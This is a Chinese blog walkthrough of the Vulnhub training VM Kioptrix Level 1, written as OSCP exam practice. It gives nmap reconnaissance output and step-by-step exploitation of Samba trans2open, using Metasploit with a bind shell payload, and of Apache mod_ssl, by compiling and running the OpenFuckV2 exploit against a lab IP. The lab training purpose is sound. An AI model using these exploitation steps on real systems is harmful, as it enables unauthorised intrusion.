类OSCP靶机-Kioptix Level 1

最新推荐文章于 2023-09-16 17:39:41 发布
最新推荐文章于 2023-09-16 17:39:41 发布
阅读量939 收藏 4
点赞数 3
分类专栏: OSCP靶机 文章标签: 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43849522/article/details/107676387
版权

同步发布:https://www.youi.xin/?p=435

类OSCP靶机-Kioptix Level 1

vulnhub简介

https://www.vulnhub.com/about/

1.环境部署

安装vmware并直接文件->打开即可

1.可能遇到的问题-网卡无法连接

需要修改 Kioptix Level 1.vmx文件,将ethernet0.networkName的值改为Nat

ethernet0.networkName = "Nat"

重启即可。

2.信息收集

首先使用nmap对网络进行扫描发现主机

发现可疑目标主机192.168.29.131,进行端口扫描,结果如下

root@cheney:~# nmap -sV -A -p 1-65535 192.168.29.131
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-28 22:34 CST
Nmap scan report for 192.168.29.131
Host is up (0.0013s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey: 
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2020-07-28T14:37:39+00:00; +1m50s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|_    SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:3D:4C:29 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_clock-skew: 1m49s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT     ADDRESS
1   1.32 ms 192.168.29.131

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 133.04 seconds

在80端口的web中发现一个mrtg http://192.168.29.131/mrtg/index.html 全流量监控 但未搜索到可利用的漏洞

在139端口运行Samba服务,但是nmap并没有扫描出端口。我们需要想办法进行版本探测
Metasploit有一个smb版本扫描模块,但是真实考试Metasploit只能使用一次(之后的操作也会尽量避开Metasploit)。在此只是介绍如何使用。

利用Metasploit扫描smb版本信息

启动msfconsole,搜索smb_version

search smb_version

执行以下命令

use auxiliary/scanner/smb/smb_version
set rhosts [靶机IP] //例如 set rhosts 192.168.29.131
set THREADS 10 //设置线程
run

3.漏洞利用-samba trans2open

非Metasploit版

得到版本信息去搜索漏洞

searchsploit samba linux 2.2

还可以到 https://www.exploit-db.com 搜索攻击脚本
samba存在一个著名的trans2open漏洞,利用该关键字搜索并下载攻击exp,下载链接: https://www.exploit-db.com/download/22469
编译并运行,攻击成功。

Metasploit版

搜索漏洞攻击脚本:

search trans2open

漏洞攻击

use exploit/linux/samba/trans2open
set rhosts 192.168.29.131
set payload linux/x86/shell/bind_tcp

攻击前查看配置

run 发射exp进行攻击,获得权限

4.漏洞利用-apache mod_ssl

搜索exp

选择Apache mod_ssl < 2.8.7 OpenSSL - ‘OpenFuckV2.c’ Remote Buffer Overflow (2) | exploits/unix/remote/47080.c 来进行攻击
编译脚本:

gcc 47080.c -o ssl_mod -lcrypto

选择攻击偏移量

攻击:

./ssl_mod 0x6b 192.168.29.131 443 -c 40

可能遇到的问题

编译时报错:

解决方法:kali下可直接安装libssl-dev

apt-get install libssl-dev
cheney_103
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub系列-Kioptix-Level-1-1
Yasso的博客
12-18 547
靶机: 192.168.249.129 kali: 192.168.249.132 一、信息收集 arp-scan -l —使用网络接口IP地址和网络掩码,生成目标主机地址列表nmap -sV 192.168.249.129 —查看开放端口 信息:Apache/1.3.20、mod_ssl/2.8.4、OpenSSL/0.9.6b nikto -host http://192.168.249.129/ —开放80、443端口,深入探测 nikto扫到CVE-2002-0082(Apache Mod_SSL
KIOPTRIX: LEVEL 1 (#1)
logan_logan的博客
12-19 500
KIOPTRIX: LEVEL 1 (#1) 1.浏览器输入地址打开,是一个Test page网页,接下来开始进行信息收集; 2.信息收集 2.1 使用namp工具对端口进行扫描 发现apache的版本较老,同时开了samba服务,接下来考虑对这两个信息进行更深入的验证。 2.2 使用gobuster枚举目录 对扫描的目录进行验证之后发现没有多少有用信息; 3.漏洞探测 3.1 apache漏洞探测 在kali里面搜索漏洞,接下来开始进行尝试 3.2 samba漏洞探测 使用msf探测到samba版
Vulnhub系列:Kioptix Level 1
Fuzz
07-30 1237
简介 Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台。 个人学习目的:1,方便学习更多类型漏洞。2,为0SCP做打基础。 下载链接 https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ 运行环境 kali:192.168.44.128 靶机:NAT模式 特别说明:有的小伙伴在打开虚拟机后,无法获取到靶机IP地址 这里特别说明:修改“Kioptix Level 1.vmx”配置文件中ethernet0.networkN
oscp——Kioptrix: Level 1 (#1)
王嘟嘟的博客
01-31 1109
0x00 前言 这个是第十七台机子了,网上说这个机子是非常简单的,所以来试验一下 链接 https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ 0x01 信息收集 1.IP 2.端口 0x02 攻击 1.端口 这里可以看到80端口开放了OpenSSL 使用nikto进行扫描(我记得oscp考试貌似不让使用工具) nikto -host 192....
oscplike:Kioptix Level 1渗透笔记
fmyyy1的博客
05-31 281
因为靶机都是在内网的,省时间写了个bash脚本利用ping命令快速探测存活主机。不过一般都是用nmap #!/bin/bash if [ $1 == ""] then echo "Usage: ./pingsweep.sh [network]" echo "Example: ./pingsweep.sh 192.168.1" else for ip in `seq 1 254`; do ping -c 1 $1.$ip | grep "64 bytes" | cut -d " " -f 4 | sed
1-OSCP自学笔记-October靶机练习1
08-04
OSCP自学笔记-October靶机练习1】这篇教程主要介绍了如何通过渗透测试技术攻破一个名为"October"的靶机靶机来自于Vulnhub平台,作者选择了10台典型的靶机作为OSCP(Offensive Security Certified Professional)...
OSCP-Human-Guide:我自己的OSCP指南
05-12
OSCP-人类指南 编辑我目前正在将所有OSCP内容和其他内容移动到“ ”中。 该存储库将没有更多更新。 带来不便敬请谅解。 该页面是一些技巧的真实记录,真正的指南是 我自己的OSCP指南,包括一些礼物,我自己制作的和...
javasnmp源码-OSCP-PWK-Notes-Public:OSCP-PWK-Notes-Public
06-04
OSCP 笔记 更加努力 欢迎 在卡利寻找自己的方式 查找、定位和哪个 定位 从由updatedb准备的数据库中读取 updatedb locate sdb.exe 哪一个 返回将在当前环境中执行的文件或链接的路径名。 它通过搜索 PATH 变量来做到...
OSCP-Cheat-Sheet:更加努力
03-05
【标题】"OSCP-Cheat-Sheet:更加努力"揭示了这个压缩包文件的主要内容,它是一个关于OSCP(Offensive Security Certified Professional)认证的学习备忘单,旨在帮助备考者更有效地准备考试。OSCP是网络安全领域的一...
java红酒网站源码-OSCP-PWK-Notes-Public:OSCP-PWK-Notes-Public
06-05
OSCP 笔记 更加努力 欢迎 在卡利寻找自己的方式 查找、定位和哪个 定位 从由updatedb准备的数据库中读取 updatedb locate sdb.exe 哪一个 返回将在当前环境中执行的文件或链接的路径名。 它通过搜索 PATH 变量来做到...
OSCP认证学习资源汇总.zip
08-19
0x0001-OSCP学习资料PWK v1.15-带书签 0x0002-OSCE学习资料-CPTV 1.0 0x0003-OSCP考试命令大全 0x0004-INE机构OSCP课程 0x0005-bof真题文件 0x0006-缓冲区溢出题目全套解决方案 0x0007-OSCP报告模板参考 0x0008-题型及答题技巧 0x0009-windows提权笔记 0x0011-lab报告模板 0x0013-考试报告模板_v1 0x0014-考试报告模板_v2 0x0020-国外培训视频 windows提权笔记
Oscp备考-Kioptrix 1】
weixin_44126257的博客
09-13 1608
Oscp备考
OSCP靶机-Kioptix Level 2
ETO发展中心
08-02 419
同步发布:https://www.youi.xin/?p=449 1.信息收集 环境部署可参考上一篇https://www.youi.xin/?p=435 通过对c段扫描发现了靶机ip,nmap扫描目标端口信息如下: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99) | ssh-hostkey: | 1024 8f:3e:8b:1e:58:63:fe:cf:27:a.
kioptrix_level_1 新手入门级通关攻略
qq_58683895的博客
09-16 653
适用于零基础新人的通关攻略,其中包含涉及到知识点
# 【oscp系列】靶机1
weixin_44807430的博客
01-15 797
快速打通靶机
Kioptrix Level 1
底层社会中的弱智
04-16 421
获取局域网中目标靶机IP 192.168.11.137为目标IP
Kioptrix Level 1靶机检测不到IP地址 (determine ip info for eth0 failed)
Viv233的博客
01-29 2181
这里写自定义目录标题背景介绍失败的尝试我是怎么开窍了呢 背景介绍 我是一枚纯小白,艰难的自学OSCP中。。。今天跟着INE的视频启动 Kioptrix Level 1靶机后 发现用netdiscover 和nmap都扫不出靶机IP。 失败的尝试 开始搜怎么回事这是,找到了这样两篇类似帖子: https://blog.csdn.net/qq_41918771/article/details/1036...
渗透日记————Kioptrix Level 1
m0_73700261的博客
04-09 404
扫描端口发现有以下端口开放其中比较重要的有三个端口开放80 22 和139端口。接着使用msf查看版本漏洞接着搜索看看有没有对应的漏洞。sumba端口是Linux系统上的一个免费软件。接着设置攻击靶机ip和对应的payload。cd进入根目录ls一下发现可以成功命令执行。发现靶机ip为:10.102.8.194。是用来为局域网内为不同计算机提供共享服务。发现该sambe服务器为2.2.1a。那么第一步先扫描发现靶机的地址。139端口是一个sumba端口。接着继续搜索历史漏洞。
KIOPTRIX: LEVEL 1-VulnHub靶机学习第二篇
qq_27466929的博客
08-23 525
VulnHub靶机学习第二篇:KIOPTRIX: LEVEL 1
oscp 2023 challenge writeup-medtech-csdn博客
最新发布
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP证书的重要性和它在信息安全领域的认可度。接着,作者向读者介绍了挑战项目MedTech的背景和目标。MedTech是一个模拟医疗技术公司的网络环境,参与者需要在该环境中寻找漏洞、获取权限,最终控制主机,获取FLAG。 在解决这个挑战的过程中,作者详细介绍了使用的工具和技术。例如,他讲解了利用漏洞扫描工具Nmap进行主机发现和服务探测的步骤,以及如何使用Metasploit框架进行漏洞利用和提权。 博客中还涵盖了其他一些有关网络渗透测试的技术,如枚举、社会工程学和Web应用程序漏洞利用。作者详细解释了每个技术的原理和实际应用。 在解决MedTech挑战的过程中,作者还分享了一些遇到的困难和技巧。他提到了一些常见的错误和陷阱,并分享了如何避免它们的经验。 最后,作者总结了整个挑战的过程,并分享了他在完成挑战时的成就感和收获。他强调了在这个过程中学到的技能和知识的重要性,并鼓励读者积极参与类似的挑战和项目。 这篇博客不仅提供了对OSCP挑战赛的深入了解,而且为读者提供了解决类似问题的思路和方法。它对于那些对信息安全和网络渗透感兴趣的读者来说是一个很有价值的参考资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值